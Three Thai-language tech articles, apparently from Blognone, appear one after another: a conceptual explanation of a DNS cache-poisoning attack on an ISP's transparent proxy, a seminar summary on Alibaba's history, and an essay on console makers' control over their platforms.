# [In-Depth] อธิบายกลไกการโจมตี Transparent Proxy **หมายเหตุ:** ต่อเนื่องจากข่าวที่แล้ว ([ระบบอินเทอร์เน็ตทรูถูกโจมตี ฝังมัลแวร์ดักข้อมูลผู้ใช้งาน](http://www.blognone.com/node/52416)) ทางทีมงานทรูได้ประสานงานมาว่าทีมเครือข่ายได้รับทราบปัญหาแล้ว กำลังหาแนวทางในการแก้ไขเป็นการถาวรอยู่ครับ ระบบอินเทอร์เน็ตมีพื้นฐานอยู่บนบริการหลายๆ อย่างทำงานร่วมกัน ในเงื่อนไขหลักที่ถือว่า **"ข้อมูลที่อีกฝ่ายตอบมาเป็นความจริง"** เป็นหลัก โดยบริการที่สำคัญมาก (และเป็นช่องโหว่ในการโจมตีมากเป็นอันดับต้นๆ) ในอินเทอร์เน็ตมีอยู่สองอย่างเท่านั้นครับ คือ routing และ DNS คือถ้าสามารถโจมตีสองอย่างในขนาดใหญ่มากๆ ได้ ก็อาจทำให้อินเทอร์เน็ตทั้งโลกหรือส่วนหนึ่งส่วนใดมีปัญหาได้เลยครับ **Routing** Routing นั้นเป็นส่วนของการแลกเปลี่ยนข้อมูลเส้นทาง และใช้หาเส้นทางในการรับ-ส่งข้อมูลกันระหว่างคู่ของหมายเลข IP (ต้นทาง-ปลายทาง) และ DNS เป็นส่วนที่ทำให้หมายเลข IP มี "ชื่อ" ที่สามารถออกเสียง และพูดถึงได้โดยง่าย รวมถึงหน้าที่ในการระบุบริการของโดเมนอย่างอื่นอีก ซึ่งจะขอไม่พูดถึงเพื่อลดความซับซ้อน โดยการใช้งานหลัก (ที่เป็น traffic ส่วนใหญ่ของการใช้งาน DNS) คือการทำหน้าที่แปลงว่า "ชื่อ" ใดๆ มีหมายเลข IP ที่เป็นที่อยู่จริงๆ ที่ไหน **DNS** ในส่วนของ DNS มีการแยกชนิดออกไปอีกเป็น 3 ส่วนคือ - Root/TLD server - authoritative server - resolver การทำงานคร่าวๆ คือ เครื่องผู้ใช้งานจะถาม resolver ว่า "ชื่อโดเมน" นี้มีหมายเลข IP ใด จากนั้น resolver จะไปหาจากข้อมูลที่เคยถูกถามแล้วตัวเองจำไว้ (cache) ถ้าไม่เจอก็จะถามไปยัง Root/TLD Server เพื่อหา authoritative server ต่อไปเรื่อยๆ (ในรูปเขียน authoritative ผิดนะครับ) เมื่อ client ได้รับหมายเลข IP จาก resolver แล้ว client ก็จะดำเนินการเชื่อมต่อไปยังเครื่องที่หมายเลข IP ดังกล่าวอีกครั้ง เพื่อที่จะติดต่อรับส่งข้อมูลใดๆ กัน แต่หากการเชื่อมต่อใดๆ ถูกดักไว้ด้วย transparent proxy ตัว client จะมองว่า transparent proxy คือ server ตัวหนึ่ง และในขณะเดียวกัน ตัว transparent proxy นี้ก็จะกลายเป็น client ที่ทำหน้าที่เชื่อมต่อกับ server ตัวจริงอีกครั้งด้วย นั่นหมายความว่า ในกรณีดังกล่าว transparent proxy จะต้องทำการ "ถาม" resolver เพื่อหาว่าชื่อโดเมนปลายทางที่ต้องการเชื่อมต่อนั้นคือหมายเลข IP อะไรอีกครั้ง **DNS Cache Poisoning** ในระบบของ DNS เนื่องจากตัวมันเองทำงานด้วยโปรโตคอล UDP ซึ่งไม่มีการยืนยันตัวตน และมีการปลอมแปลงข้อมูลต้นทางได้ง่าย ทำให้มีช่องโหว่หนึ่งชื่อ DNS Cache Poisoning คือการปลอมข้อมูลที่ resolver ได้รับจาก authoritative server เพื่อให้ข้อมูลหลังจากนั้นเป็นหมายเลข IP ที่ไม่ถูกต้อง ทำให้เมื่อมี transparent proxy เข้ามาในระบบจึงเกิดเป็นช่องโหว่ที่รุนแรงกว่ากันมาก เมื่อเทียบกับการที่ client ยังสามารถเปลี่ยน resolver ไปใช้ของบริการภายนอกที่น่าเชื่อถือ (เช่น Google DNS หรือ OpenDNS) จากกระบวนการนี้ ขั้นตอนส่วนที่มีปัญหาคือการที่ resolver ที่ transparent proxy เรียกใช้งานถูกปลอมแปลงข้อมูลได้ และไปรับข้อมูลจากเครื่องเซิร์ฟเวอร์ปลอม (spoof source) แทนที่ authoritative sever ของโดเมนดังกล่าว ขั้นตอนที่ 9 ที่เป็นสีแดงที่ควรจะเป็นจึงถูก resolver มองข้ามไป แล้วนำข้อมูลปลอมตอบกลับให้แก่ transparent proxy ในการนี้ผู้ไม่ประสงค์ดีจำเป็นต้องทราบว่า resolver ตัวดังกล่าวคือหมายเลข IP อะไรเพื่อที่จะโจมตีให้ได้ จากนั้นเมื่อ transparent proxy ทำการดึงข้อมูลจาก server ปลอมดังกล่าวแล้ว ตัว transparent proxy ก็จะทำการ cache ข้อมูลดังกล่าวไว้ด้วย เพื่อที่จะส่งให้แก่ผู้ใช้คนอื่นๆ ที่มีการร้องขอข้อมูลไฟล์เดียวกัน ทำให้ผู้ใช้หลายๆ รายได้รับข้อมูลปลอมไปพร้อมๆ กันโดยไม่เกี่ยวกับการตั้งค่า resolver ที่ client ใดๆ ทั้งสิ้นครับ ในการนี้ ผู้ไม่ประสงค์ดีสามารถโจมตี resolver ในระยะเวลาสั้นมากๆ เพื่อไม่ให้เป็นที่ผิดสังเกตจนสามารถตามหาเครื่องที่เก็บ malware เจอได้ แล้วให้ transparent proxy ผู้ถูกหลอกนี้เป็นผู้ปล่อย malware แทน ทำให้ตรวจสอบได้ยากขึ้นอีกมากครับ
# เปิดตำนานการสร้าง Alibaba จากอดีตผู้บริหารคนใน อะไรคือปัจจัยของความสำเร็จระดับโลก เมื่อวานนี้ ศูนย์สร้างสรรค์งานออกแบบ (TCDC) จัดงานสัมมนาประจำปี Creative Unfold 2015 โดยหนึ่งในวิทยากรที่เชิญมาคือ **Porter Erisman** อดีตผู้บริหารของ Alibaba ยักษ์ใหญ่แห่งวงการอีคอมเมิร์ซจีน ที่มาเล่าประวัติศาสตร์เชิงลึกของ Alibaba ในฐานะอดีตพนักงาน ผมฟังแล้วได้ประโยชน์มาก เลยเก็บเนื้อหา \+ ถ่ายสไลด์มาเผยแพร่ต่อครับ (รูปเยอะหน่อยนะครับ) Porter Erisman ที่งานของ TCDC Porter เป็นพนักงานต่างชาติคนแรกๆ ของ Alibaba อยู่กับบริษัทในปี 2000-2008 เขาเคยเรียน MBA ที่ศศินทร์ จุฬาลงกรณ์มหาวิทยาลัย และเข้าทำงานกับ Alibaba ในช่วงที่เพิ่งย้ายออกมาจากอพาร์ทเมนต์ของ Jack Ma หลังลาออกจาก Alibaba เขาตัดสินใจบันทึกประวัติของบริษัทผ่านภาพยนตร์สารคดี [Crocodile in the Yangtze](http://www.crocodileintheyangtze.com/) (ออกฉายปี 2012) และเขียนหนังสือ Alibaba's World: How a Remarkable Chinese Company is Changing the Face of Global Business (วางขาย พ.ค. 2015) ซึ่งกำลังจะมีฉบับแปลภาษาไทยด้วย Porter เล่าความเป็นมาของวงการอีคอมเมิร์ซโลกว่า เริ่มขึ้นในทศวรรษ 90s โดยบริษัทฝั่งอเมริกา 2 รายคือ Amazon (โมเดลห้าง) และ eBay (โมเดลตลาด) โมเดลของอีคอมเมิร์ซตะวันตก เป็นส่วนต่อขยายของการค้าปลีกฝรั่งที่มีประสิทธิภาพสูงและเป็นระบบมาก (พวกห้างสรรพสินค้าหรือซูเปอร์มาร์เก็ต) อีคอมเมิร์ซเป็นแค่ส่วนที่ช่วยให้เราซื้อของได้สะดวกขึ้น โดยไม่ต้องเดินทางไปห้างเท่านั้นเอง แต่กรณีของประเทศจีนที่เพิ่งพัฒนาทุนนิยม เพิ่งออกมาจากระบบคอมมิวนิสต์ ไม่มีระบบค้าปลีกแบบเดียวกัน คำถามคืออีคอมเมิร์ซในจีนควรเป็นอย่างไร? สมัยที่ Jack Ma เริ่มทำ Alibaba ใหม่ๆ เขาต้องเผชิญกับความท้าทายมากมาย เช่น คนจีนเข้าไม่ถึงอินเทอร์เน็ต ไม่ใช่บัตรเครดิต ระบบลอจิสติกส์ห่วย คนจีนเองยังไม่เชื่อถือกันเลย ไม่เคารพกฎหมาย ฯลฯ ในปี 1999 ช่วงที่ Alibaba ยังล้มลุกคลุกคลาน Jack ประชุมพนักงานรุ่นแรกจำนวน 17 คนที่บ้านของเขาเอง (Alibaba มีผู้ก่อตั้งทั้งหมด 18 คนนี้) และพูดถึงวิสัยทัศน์ของเขากับ Alibaba ว่าต้องทำอะไรบ้าง การพูดครั้งนั้นถูกบันทึกเทปไว้ และ Porter นำมาเผยแพร่ต่อ รวมถึงใช้ในหนังสารคดีของเขาด้วย ในเทปปี 1999 นี้ Jack Ma บอกเพื่อนร่วมอุดมการณ์ว่าไม่ต้องห่วงปัญหาข้างต้น ขอให้พนักงานทุกคนอดทนประมาณ 3-5 ปี ขอให้ทำงานหนักแบบเดียวกับคู่แข่งในซิลิคอนวัลเลย์ เลิกคิดถึงการทำงานแบบ 9 โมงเช้าถึง 5 โมงเย็นซะ ขอให้คิดว่าเราจะเป็นบริษัทระดับโลกตั้งแต่วันแรก และเขาคิดว่าบริษัทน่าจะพ้นช่วงยากลำบากไปได้ และ IPO เข้าตลาดหลักทรัพย์ในปี 2002 แนะนำอย่างยิ่งให้ผู้สนใจประวัติของ Alibaba ดูคลิปนี้ครับ (ใครคิดจะทำสตาร์ตอัพยิ่งต้องดูนะ) จากนั้นเส้นทางของ Alibaba ก็เริ่มต้นขึ้น โดย**เว็บไซต์ [Alibaba.com](http://alibaba.com/)** เป็นเว็บขายของแบบ B2B สำหรับผู้ส่งออก-นำเข้าสินค้าในจีน ช่วงแรกบริษัทโปรโมทตัวเองว่าเป็นเว็บไซต์ online trade show เพื่อให้ผู้นำเข้าส่งออกมองว่าเป็นพื้นที่ขายของที่เพิ่มเข้ามา ไม่ใช่คู่แข่งที่เข้ามาชิงส่วนแบ่งตลาด ต่อมา บริษัทขยายตัวมาทำค้าปลีก โดยเปิด**เว็บที่สอง [Taobao.com](http://taobao.com/)** อิงตามโมเดลของร้านค้าปลีก ร้านโชว์ห่วยของจีน ตรงนี้ Porter อธิบายว่าโมเดลของ eBay ในช่วงแรกคือการนำของเก่าหรือของสะสมมาขายมือสอง ซึ่งโลกตะวันตกมีระบบทุนนิยมมานาน คนมีของเก่าสะสมไว้เยอะ แต่จีนเพิ่งออกมาสู่ระบบทุนนิยม แต่ละบ้านแทบไม่มีของอะไรที่นำมาขายได้เลย จึงต้องเปลี่ยนมาเป็นการผลักร้านค้าปลีกเล็กๆ ขึ้นมาอยู่บนอินเทอร์เน็ตแทน แน่นอนว่า Taobao ถูกนำไปเปรียบเทียบกับ eBay ซึ่ง Jack Ma ก็กล่าววาทะที่มีชื่อเสียงเอาไว้ว่า eBay เปรียบเสมือนฉลามในมหาสมุทร ส่วน Alibaba เป็นแค่จระเข้ในแม่น้ำแยงซีเกียง (Crocodile in the Yangtze River) ถ้าเราต่อสู้กันในทะเล เราแพ้แน่ แต่ถ้าสมรภูมิคือแม่น้ำ เราจะเป็นผู้ชนะ วาทะนี้ทำให้ Porter นำไปตั้งเป็นชื่อหนังสารคดีนั่นเอง งานสำคัญอย่างหนึ่งของ Porter คือรับผิดชอบการออกแบบเว็บ Taobao ซึ่งเขาก็ค้นหาคำตอบว่าควรทำอย่างไร ตำราการออกแบบเว็บในโลกตะวันตกมักชูเรื่องความสะอาด เรียบง่าย ไม่รก ซึ่งขัดกับอุปนิสัยของคนจีนที่ชอบเยอะๆ เห็นสินค้าครบถ้วนในหน้าจอเดียว แต่จุดเด่นของ Taobao จริงๆ คือปุ่ม "แชตกับคนขาย" ช่วยให้ลูกค้าสามารถคุยกับคนขายได้จริงๆ ก่อนสั่งสินค้า ตรงนี้ Porter อธิบายว่าเป็นเพราะอุปนิสัยของคนเอเชียที่เน้นสายสัมพันธ์ระหว่างคน ซึ่งต่างจากโมเดลฝรั่งที่เน้นระบบอัตโนมัติ ไม่ต้องคุยกับคน และ eBay ไม่อยากให้ลูกค้ากับคนขายคุยกันเองเพราะกลัวเสียสถานะตัวกลาง กรณีของ Taobao กลับกันคือคนจีนไม่เชื่อใจกันเอง ไม่เชื่อใจคนขายที่ไม่รู้จัก ดังนั้นการได้พูดคุยทำความรู้จักกันก่อน จะช่วยให้ผู้ซื้อสะดวกใจมากขึ้นเพราะเริ่มรู้จักคนขายแล้วว่าเป็นอย่างไร ซึ่ง Porter มองว่าอีคอมเมิร์ซเมืองไทยก็มีลักษณะคล้ายคลึงกัน นิยามของ Taobao จึงไม่ใช่อีคอมเมิร์ซแบบดั้งเดิม แต่เป็น social commerce ที่เป็นชุมชนระหว่างคนซื้อกับคนขายด้วย ลูกค้าหลายคนกลายเป็นเพื่อนกับคนขาย และมีหลายคู่ที่ได้แต่งงานกันเพราะ Taobao ซึ่ง Porter บอกว่าถ้าอยู่ในอเมริกาแล้วบอกว่าเจอกับแฟนผ่าน Amazon คงเป็นไปไม่ได้ ปัจจัยเรื่อง social เป็นจิ๊กซอชิ้นแรกที่ทำให้คนใช้ Taobao กันมาก ต่อมาบริษัทก็แก้ปัญหาเรื่องความไม่เชื่อใจกันระหว่างคนซื้อกับคนขาย ว่าจะเชิดเงินหรือไม่ ด้วยระบบจ่ายเงิน Alipay ที่ต่างไปจากระบบของ PayPal ตรงที่ Alipay ทำตัวเป็นคนกลางถือเงิน (escrow) ระบบของ Alipay ผู้ซื้อจะจ่ายเงินไปให้ตัวกลาง Alipay ก่อน จากนั้น Alipay จะแจ้งผู้ขายว่าได้รับเงินจากผู้ซื้อแล้ว แต่ยังไม่จ่ายเงินให้ผู้ขาย ฝั่งของผู้ขายจะต้องส่งสินค้าให้ถึงมือผู้ซื้อก่อน เมื่อเสร็จกระบวนการแล้ว Alipay ค่อยโอนเงินส่วนนี้ให้ Alibaba ไม่ได้ลงมาทำระบบลอจิสติกส์เอง เพราะมีแนวคิดว่าปล่อยให้คนขายจัดการเองมีประสิทธิภาพมากกว่า (หลายครั้ง ผู้ขายใช้วิธีส่งของด้วยการขี่จักรยานไปส่งแทนการใช้ระบบลอจิสติกส์) แต่ช่วงหลังพอตลาดโตขึ้นมาก ระบบลอจิสติกส์เอกชนเริ่มรองรับไม่ไหว ทำให้ Alibaba ต้องเข้ามาลงทุนบ้าง แต่ก็ยังไม่ใช่ธุรกิจหลักของบริษัท เน้นลงทุนเพื่อให้พาร์ทเนอร์โตทันความต้องการมากกว่า ปัจจัยข้อที่สามที่ช่วยผลักดัน Taobao คือ Alibaba ตัดสินใจไม่คิดค่าธรรมเนียมผู้ขายเป็นเวลา 3 ปี เพื่อให้คนกล้าเข้ามาใช้ระบบแล้วบอกต่อ เพราะคนจีนจะไม่กล้าจ่ายเงินถ้าหากไม่ได้ลองขายก่อน ตรงนี้ฝั่ง eBay ไม่สนใจและบอกว่าไม่มีคำว่า "ฟรี" อยู่ในหัวเลย นอกจากนี้ Taobao ยังมีระบบแก้ไขข้อขัดแย้งระหว่างผู้ซื้อกับผู้ขาย (dispute management) ด้วย**ระบบลูกขุน** (jury) ภายในเว็บ ที่ให้แต่ละฝ่ายเสนอตัวแทนลูกขุนเข้ามาพิจารณาข้อขัดแย้ง เป็นโมเดลที่ดูแลกันเองภายในชุมชน และช่วยแก้ปัญหาเรื่องความขัดแย้งไปได้มาก ประเด็นเรื่องสินค้าปลอม Taobao ใช้การตรวจสอบอย่างเคร่งครัด ทั้งจากฝ่ายแบรนด์เจ้าของสินค้า ฝั่งร้านค้า และผู้ซื้อที่ช่วยกันตรวจตรา ถัดจาก Taobao ที่เป็นโมเดลร้านโชว์ห่วย ก็เป็นคิวของ **[Tmall.com](http://tmall.com/)** ที่เป็นเหมือน "ห้างสรรพสินค้าออนไลน์" แบรนด์มาขายเอง เน้นสินค้าหรูหรามีราคามากขึ้น Porter บอกว่าในสหรัฐมีห้างสรรพสินค้ามากมาย การมาขายสินค้าออนไลน์ถือเป็นเพียงช่องทางหนึ่งเท่านั้น และเว็บอีคอมเมิร์ซเองก็พยายามเอาชนะห้างสรรพสินค้าด้วย เป็นคู่แข่งกันโดยตรง แถมเว็บอีคอมเมิร์ซเองพยายามลดความสำคัญของแบรนด์สินค้าลง เน้นไปที่ตัวสินค้าเป็นหลัก ดังจะเห็นได้จากเพจของแบรนด์บน Amazon ที่มีโลโก้แบรนด์น้อยมาก ปรับแต่งอะไรแทบไม่ได้เลย แต่กรณีของ Tmall นั้นกลับกัน เพราะจีนไม่มีระบบห้างสรรพสินค้าที่ดีพอ บริษัทจึงมองว่าต้องทำ Tmall ให้เป็นห้างสำหรับแบรนด์มาขายของ เลยเปิดพื้นที่ให้จัดเต็มเรื่องโฆษณาอย่างเต็มที่ ผลกลายเป็นว่ามีแบรนด์สินค้าจำนวนมากไม่มีหน้าร้านจริงๆ และเปิดร้านบน Tmall เพียงอย่างเดียว ตัวอย่างในภาพคือแบรนด์เสื้อผ้า HSTYLE จากเกาหลีใต้ เน้นใช้ดาราช่วยโปรโมท (ทั้งดาราเกาหลีและจีน) โดยไม่ต้องมีหน้าร้านเลย ขายออนไลน์ล้วนๆ Porter ยังบอกว่าปัจจุบันมีอาชีพ Taobao models คือสาวสวยหนุ่มหล่อ รับจ้างเป็นนางแบบนายแบบบน Taobao เพียงอย่างเดียว (คล้ายกับร้านเสื้อผ้าบน Facebook/Instagram ในบ้านเรา) มีผู้ฟังถามว่าการขายเสื้อผ้าออนไลน์ มักติดปัญหาเรื่องสินค้าต้องลองสวมก่อน กรณีแบบนี้ Alibaba แก้ปัญหาอย่างไร คำตอบคือต้องเริ่มจากนโยบายรับประกันการคืนสินค้าก่อน ภายใน 7 วันถ้าผู้ซื้อต้องการคืนสินค้า ผู้ขายไม่มีสิทธิถามใดๆ ต้องรับคืนเสมอ ในภาพรวมแล้ว โมเดลของ Alibaba คือการสร้าง ecosystem ของการค้าขนาดใหญ่ มีเว็บไซต์หลากหลายรองรับความต้องการของลูกค้าทุกกลุ่ม และมีระบบจ่ายเงิน Alipay เป็นตัวกลางให้ธุรกรรมราบรื่น ในประเทศจีนมีธรรมเนียมที่เรียกว่า "วันคนโสด" (Singles' Day) เป็นด้านกลับของวันวาเลนไทน์ ซึ่ง Alibaba ใช้โอกาสนี้เปลี่ยนวันคนโสด มาเป็นวันช็อปปิ้งแก้เครียดเรื่องโสด ผลคือวันคนโสดปี 2014 บริษัททำยอดขายได้ถึง 9.3 พันล้านดอลลาร์ภายในวันเดียว บทสรุปของตำนาน Alibaba คือการปรับโมเดลคอมเมิร์ซให้เหมาะกับความต้องการของท้องถิ่น ซึ่ง Jack Ma เปรียบเทียบว่าในโลกตะวันตก อีคอมเมิร์ซเป็นแค่ของหวาน (dessert) เพราะระบบการค้าทั่วไปดีอยู่แล้ว แต่ในจีนที่ไม่มีอะไรเลย อีคอมเมิร์ซสำคัญระดับอาหารจานหลัก (main course) ปัจจุบัน อีคอมเมิร์ซในจีนเฟื่องฟูมาก ผู้เล่นรายใหญ่คือ Alibaba, [JD.com](http://jd.com/), Tencent และมีรายเล็กจับตลาดเฉพาะทางอีกมาก Porter สรุปปิดท้ายว่า ในประเทศกำลังพัฒนาหลายๆ แห่งที่เคยไปเยือน เขาพบรูปแบบอีคอมเมิร์ซคล้ายคลึงกัน นั่นคือทำหน้าที่แทนระบบค้าปลีกที่ไม่มีประสิทธิภาพมากนัก ตัวอย่างประเทศในแอฟริกาเคยมอง Amazon เป็นโมเดล แต่ทำไปสักพักก็พบว่าทำแบบ Alibaba เหมาะสมกว่า เรื่องสภาพตลาดของแต่ละประเทศมีความสำคัญมาก เป็นเหตุที่ทำให้ Amazon/eBay ไม่เวิร์คในจีน และ Alibaba ไม่เหมาะสำหรับอเมริกาเช่นกัน Porter บอกว่าตรงนี้เป็นหน้าที่ของผู้ประกอบการในแต่ละประเทศต้องค้นหาคำตอบที่เหมาะสม อย่างในอินเดียก็มี Flipkart และ Snapdeal ส่วนในเอเชียตะวันออกเฉียงใต้ก็มี Lazada และ Tokopedia ช่วงถามตอบ ผมถาม Porter ว่าความสำเร็จอย่างที่สุดของ Jack Ma ในฐานะผู้นำองค์กรคืออะไร ซึ่ง Porter เล่าว่าเดิมที Jack Ma มองว่าตัวเองจะเป็นซีอีโอแค่ 4 ปีเท่านั้น เพราะมองว่าตัวเองมีพื้นเพเป็นแค่ครูสอนภาษาอังกฤษ ไม่เหมาะจะเป็นผู้บริหารขององค์กรใหญ่ แต่สุดท้ายพอบริษัทเติบโต ลองดึงผู้บริหารข้างนอกเข้ามาก็พบว่าไม่เวิร์ค เพราะขาดพลังความเป็นผู้ประกอบการ (entrepreneur spirit) แบบ Jack ส่วนผลงานสำคัญของ Jack คือสามารถจูงใจทีมงานให้คิดใหญ่ได้ เขาสามารถปรับเปลี่ยนตัวเอง (transformation) ให้มีศักยภาพมากขึ้นตามขนาดองค์กรที่เติบโตขึ้น ซึ่งเป็นคุณลักษณะสำคัญของผู้นำสตาร์ตอัพ นอกจากนี้เขายังให้ความสำคัญกับวัฒนธรรมองค์กรเป็นอย่างมาก ในอดีต Alibaba เคยเติบโตเร็วแบบสะเปะสะปะ จน Jack และ Porter ต้องบินไปอเมริกาเพื่อปลดพนักงานในอเมริกาทั้งหมด แล้วสร้างองค์กรขึ้นมาใหม่ บทเรียนครั้งนั้นทำให้บริษัทกำหนด "คุณค่า" (value) ขององค์กรขึ้นมา 9 ข้อ และกำหนดเงื่อนไขการจ่ายโบนัสประจำปีว่าบริษัททำได้ดีแค่ไหนใน 9 ข้อนี้ด้วย Porter ให้คำแนะนำกับผู้ประกอบการคอมเมิร์ซบ้านเราว่า ขอให้มองความพึงพอใจของลูกค้าเป็นหลัก มองเป็นอย่างแรกสุด อย่าเริ่มจากการมองว่าตลาดนี้สดใส น่าเข้าไปชิงเค้ก ซึ่งตัวอย่างมีให้เห็นแล้วจากบรรดาโคลนของ Groupon ที่ล้มตายกันหมด สุดท้ายเขามองว่าข้อจำกัดของตลาดคอมเมิร์ซเมืองไทยคือระบบจ่ายเงินที่ยังอิงกับเงินสดหรือการโอนเงิน ซึ่งไม่มีประสิทธิภาพ เมืองจีนเคยเผชิญปัญหานี้และสามารถแก้ได้ด้วย Alipay ดังนั้นถ้ามีคนไทยทำระบบที่ทัดเทียม Alipay ขึ้นมาได้ ในท้ายที่สุด การจ่ายเงินสดเมื่อได้รับสินค้า (cash on delivery) จะหายไปภายใน 5 ปี
# สิทธิ์ในการควบคุมแพลตฟอร์ม หรืออิสระในการใช้งานฮาร์ดแวร์ ประเด็นหนึ่งเราคงจะได้เห็นกันอยู่บ่อยๆ ถ้าพูดถึง App Store ของ iPhone คือเรื่องของการใช้สิทธิ์ของแอปเปิลในการควบคุมแอพพลิเคชันต่างๆ ที่จะมาทำงานบน iPhone ได้ แน่นอนว่าแนวคิดนี้ถูกวิพากษ์วิจารณ์อย่างหนักในช่วงเวลาที่ผ่านมา ทั้งในด้านที่สนับสนุนและคัดค้าน จริงๆ แล้วเรื่องของการควบคุมแพลตฟอร์มของตนเองให้เป็นไปในทิศทางที่ผู้ผลิตต้องการไม่ใช่เรื่องใหม่ และตัวอย่างที่เด่นชัดที่สุดคือคอนโซลเกมต่างๆ ไม่ว่าจะเป็นเครื่องเล่นเกมของโซนี่, นินเทนโด หรือไมโครซอฟท์ ปัจจุบันการที่ผู้ผลิตเกมจะสามารถทำเกมและวางจำหน่ายได้ จะต้องได้รับการอนุญาต (licensed) จากผู้ผลิตคอนโซลนั้นๆ เสียก่อน ซึ่งในขั้นตอนดังกล่าวจะต้องมีการจ่ายค่าสิทธิ์สัญญาอนุญาต หรือการแบ่งส่วนแบ่งในการขายให้แล้วแต่กรณี ซึ่งเป็นรายได้ส่วนหนึ่งที่สำคัญของบริษัทคอนโซลเหล่านี้ แต่รายได้ไม่ใช่ปัจจัยเดียวที่คอนโซลเกมเหล่านี้ต้องการควบคุม แต่หากเป็นประสบการณ์ของผู้เล่นโดยรวมในคอนโซล ไปตั้งแต่เรื่องเล็กๆ ไปจนถึงเรื่องใหญ่ๆ ในเกม ยกตัวอย่างเช่นความชัดเจนของการใช้อินเตอร์เฟซต่างๆ ของเกมบนแพลตฟอร์ม อย่างการควบคุมให้ปุ่ม X หมายถึงตอบรับและปุ่ม O เป็นการยกเลิกบนเครื่องในกลุ่ม PlayStation ฝั่งโลกตะวันตกจนกลายเป็นมาตรฐานที่ผู้เล่นคุ้นเคยได้ ไปจนถึงข้อความเตือนเรื่องความปลอดภัยที่แสนจุกจิกบน Wii ทั้งหมดทั้งมวลคือความตั้งใจของผู้ผลิตในฐานะผู้รักษาความสงบเรียบร้อยของแพลตฟอร์มให้อยู่ในทิศทางเดียวกันและเหมาะสม แน่นอนว่าการควบคุมเหล่านี้อาจส่งผลให้เกิดความไม่พอใจกับกลุ่มคนบางส่วน อย่างในกรณีของนินเทนโดซึ่งมีจุดยืนในเรื่องของการสร้างเครื่องเกมเพื่อความบันเทิงในครอบครัวมาตลอด เราจะเห็นได้ว่าอัตราส่วนของเกมที่มีความรุนแรงบนแพลตฟอร์มฝั่งนินเทนโดจะต่ำกว่าเจ้าอื่นๆ เป็นอย่างมาก นินเทนโดได้พยายามควบคุมเนื้อหาแม้กระทั่งจุดเล็กๆ อย่างการอ้างอิงถึงแอลกอฮอล์ใน Final Fantasy VI เวอร์ชั่นภาษาอังกฤษจะต้องถูกปรับเป็นเครื่องดื่มอื่นๆ แทน กระทั่งบาร์ก็ต้องถูกเปลี่ยนให้เรียกว่าร้านกาแฟ (Café)1 ไปจนถึงกรณีศึกษาที่สำคัญในสมัยเครื่อง Super Nintendo Entertainment System (SNES) คือเรื่องของเกม Mortal Kombat เกม Mortal Kombat เป็นเกมต่อสู้แบบคลาสสิกบนเกมอาร์เขตในปี 1992 ก่อนที่จะถูกพอร์ทไปยังเครื่องต่างๆ ในเวลาต่อมา ในยุคนั้นเกม Mortal Kombat ถือว่ามีเนื้อหาที่รุนแรงมากไม่ว่าจะในเรื่องของเอฟเฟกภาพต่างๆ ไปจนถึงเอกลักษณ์ Fatality ที่จะเป็นการแสดงเอฟเฟกพิเศษหากผู้เล่นสามารถกดท่าได้ถูกต้องในท่าสุดท้ายก่อนที่จะชนะอีกฝ่าย ซึ่งโดยทั่วไปจะแสดงออกถึงการฆ่าคู่ต่อสู้อย่างทารุณ แน่นอนว่าในมุมของนักเล่นเกมย่อมมองว่าเป็นความคิดสร้างสรรค์ใหม่ๆ ในยุคนั้น แต่ในอีกมุมหนึ่งกลับเป็นเรื่องที่ยอมรับไม่ได้ในมุมมองของศีลธรรม จนในปี 1993 เมื่อเกม Mortal Kombat ได้รับการพอร์ทมายังเครื่อง SNES เลือดทั้งหมดถูกเปลี่ยนเป็นสีเทา รวมถึงมีการแก้ไข Fatality ให้เบาบางลงอย่างเห็นได้ชัด2 นินเทนโดได้รับการวิพากษ์วิจารณ์อย่างมากถึงขอบเขตที่ควรจะมีในการควบคุมเกมบนแพลตฟอร์มของตนเอง แม้ว่าหลังจากนั้นเมื่อ ESRB ถูกก่อตั้งขึ้นในปี 1994 และเริ่มทำงานได้เป็นรูปเป็นร่างอย่างชัดเจน เกมต่างๆ ถูกจัดเรทอย่างเหมาะสม และคอนโซลในยุคใหม่ๆ ก็มีฟีเจอร์ของการควบคุมโดยผู้ปกครองหมดแล้ว ปัญหาในลักษณะนี้จึงไม่ใช่เรื่องใหญ่อีกต่อไปเท่าไร ในทางกลับกัน แพลตฟอร์มเสรีอย่างเช่น Windows ของไมโครซอฟท์ ได้ประสบปัญหาของการควบคุมซอฟต์แวร์ต่างๆ บนแพลตฟอร์มให้รักษามาตรฐานของอินเตอร์เฟซให้เหมือนๆ กัน ในช่วง 10 กว่าปีที่ผ่านมานับตั้งแต่ Windows 95 เราจะได้เห็นความสับสนของการใช้งานอินเตอร์เฟซต่างๆ ไม่ว่าจะเป็นกรณีการใช้ Notification Area อย่างเอิกเกริก การแทรกปุ่มเข้าไปบนทูลบาร์ของ IE ไปจนถึงความสับสนของหน้าต่างและโปรแกรมระหว่าง MDI และ Taskbar ของ Excel3 ทั้งหมดนี้เป็นตัวอย่างหนึ่งที่เกิดขึ้นได้จากการที่แพลตฟอร์มไม่ได้รับการควบคุม แต่ก็แลกมาด้วยข้อดีของอิสรภาพของผู้ใช้และผู้พัฒนา อีกประเด็นที่นินเทนโดถูกวิพากษ์วิจารณ์อย่างหนัก คือเรื่องของระบบ Friend Code (FC) บนเครื่อง Wii และ DS ซึ่งเป็นระบบออนไลน์ที่ยุ่งยากมากหากเทียบกับทางฝั่งของโซนี่และไมโครซอฟท์ หลักการของระบบนี้คือผู้เล่นแต่ละคนจะมีรหัสเป็นตัวเลข 16 หรือ 12 หลักประจำเครื่องหรือเกมของตนเอง และการที่จะเล่นเกมร่วมกับบุคคลอื่นๆ ได้ เราจำเป็นต้องมีรหัสของคนๆ นั้น รวมถึงคนๆ นั้นต้องมีรหัสของเรา ซึ่งต่างกับระบบของ PlayStation Network หรือ Xbox Live ที่เปิดช่องทางให้ผู้เล่นพบปะกับผู้เล่นหน้าใหม่ๆ อื่นๆ ได้โดยง่าย แม้ว่าทางนินเทนโดจะยอมรับว่าระบบนี้ไม่สมบูรณ์ แต่ประเด็นที่นินเทนโดเป็นห่วงที่สุดคือการป้องกันผู้เล่นที่เป็นเยาวชน4 ระบบ FC จะป้องกันให้ผู้เล่นสามารถติดต่อออนไลน์ผ่านเครื่อง Wii หรือ DS กับคนที่เขารู้จักหรือสามารถติดต่อด้วยวิธีการใดๆ ได้ทางอื่นก่อนเท่านั้น ซึ่งทำให้ผู้ผลิตส่วนใหญ่ต้องทำตาม และทำให้ฟีเจอร์การเล่นออนไลน์ของเกมนั้นๆ บนเครื่อง Wii อ่อนด้อยลงอย่างเห็นได้ชัดหากเทียบกับเกมเดียวกันบนคอนโซลอื่นๆ (เช่น Rock Band) 